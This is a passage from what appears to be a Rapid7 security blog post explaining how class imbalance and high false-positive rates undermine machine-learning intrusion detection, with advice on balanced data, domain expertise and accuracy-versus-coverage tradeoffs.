we find that: To have reasonable confidence in an IDS under these biased conditions, we must have not only unrealistically high hit rate, but also unrealistically low false positive rate. That is, for an IDS to be 80 percent accurate, even with a best case scenario of a 100 percent hit rate, the IDS' false alarm rate must be 4 x 10−4. In other words, only 4 out of 10,000 alarms can be false positives to achieve this accuracy. Visualizing Accuracy One way to actually “see” this is with a chart designed to visually depict the accuracy of our classifier (called a receiver operating characteristic—or, ROC—curve): From "Proper Use of ROC Curves in Intrusion/Anomaly Detection" As we train, test and use a model, we want the ratio of true positives to false positives to be better than chance and also accurate enough to make it worthwhile using (in whatever context that happens to be). In the real world, detection hit rates are much lower and false alarm rates are much higher. Thus, class representation bias in the security context can make machine learning algorithms inaccurate and untrustworthy. When models are trained on only a few examples of one class but many examples of another, the bar for reasonable accuracy is extremely high, and in some cases unachievable . Predictive algorithms run the risk of being "the boy who cried wolf" – annoying and prone to desensitizing security professionals to incident alerts[2] . That last thing you want to do is create a fancy new system that only exacerbates the problem that was identified at the core of the Target/Home Depot breaches. “ When models are trained on only a few examples of one class but many examples of another, the bar for reasonable accuracy is extremely high, and in some cases unachievable” Avoiding the Pitfalls Security data scientists can avoid these obstacles with a few measures: Train models with large and balanced data that are representative of all output classes. Take balanced subsamples of your data if necessary and use available techniques to get an understanding of the efficacy of your data sets. Focus on getting a plethora of labeled data. Amazon's Mechanical Turk is a useful tool for this and is used by many researches outside of security is one example. Look at open sourced data, and encourage data gathering expeditions. Encourage security expertise on the team. Domain expertise is crucial to the performance of machine learning algorithms applied in the security space. To keep up with the changing threat landscape, one must have security experience. Incorporate unsupervised methods into the solution of the data science problem. Focus on organization, presentation, visualization, filtering of data - not just prediction.  Check out this handy tutorial on self-taught learning by Stanford. Weigh the tradeoff of accuracy (i.e. getting all the “guesses” right) vs. coverage. You can think of this in terms of a Bloom filter. In the case of search, it's more important that all the matching elements are returned even if that means some incorrect elements are returned. Depending on the application of your classification algorithm, you may be able to make similar tradeoffs. Machine learning has the potential to revolutionize how we detect and respond to malicious activity in our networks. It can weed out signal from noise to help incident responders focus on what's truly important and help administrators discover patterns in network activity never seen before. However, when delving into applying these algorithms to security we must be aware of caveats of the approach, so we may overcome them.

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Toolkit

Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now